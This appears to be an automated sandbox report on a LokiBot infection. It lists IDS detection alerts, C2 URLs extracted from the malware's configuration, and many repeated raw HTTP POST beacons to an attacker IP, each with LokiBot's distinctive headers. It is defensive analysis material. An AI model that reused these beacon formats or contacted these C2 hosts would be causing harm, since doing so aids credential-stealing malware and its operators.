                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49850 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49850 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49936 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49936 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49850
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49941 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49916
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49941 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49941 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49770
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49941 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49941 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49936
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49941
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49950 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49950 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49950 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49950 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49950 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49871 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49871 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49871 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49950
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49871 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49871 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49866 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49866 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49866 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49871
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49866 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49866 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49866
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: 94.156.177.41/kings/five/fre.php
                Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
                Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 149Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00404ED4 recv,8_2_00404ED4
                Source: unknownHTTP traffic detected: POST /kings/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 2F83DE58Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 04 Dec 2024 05:52:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
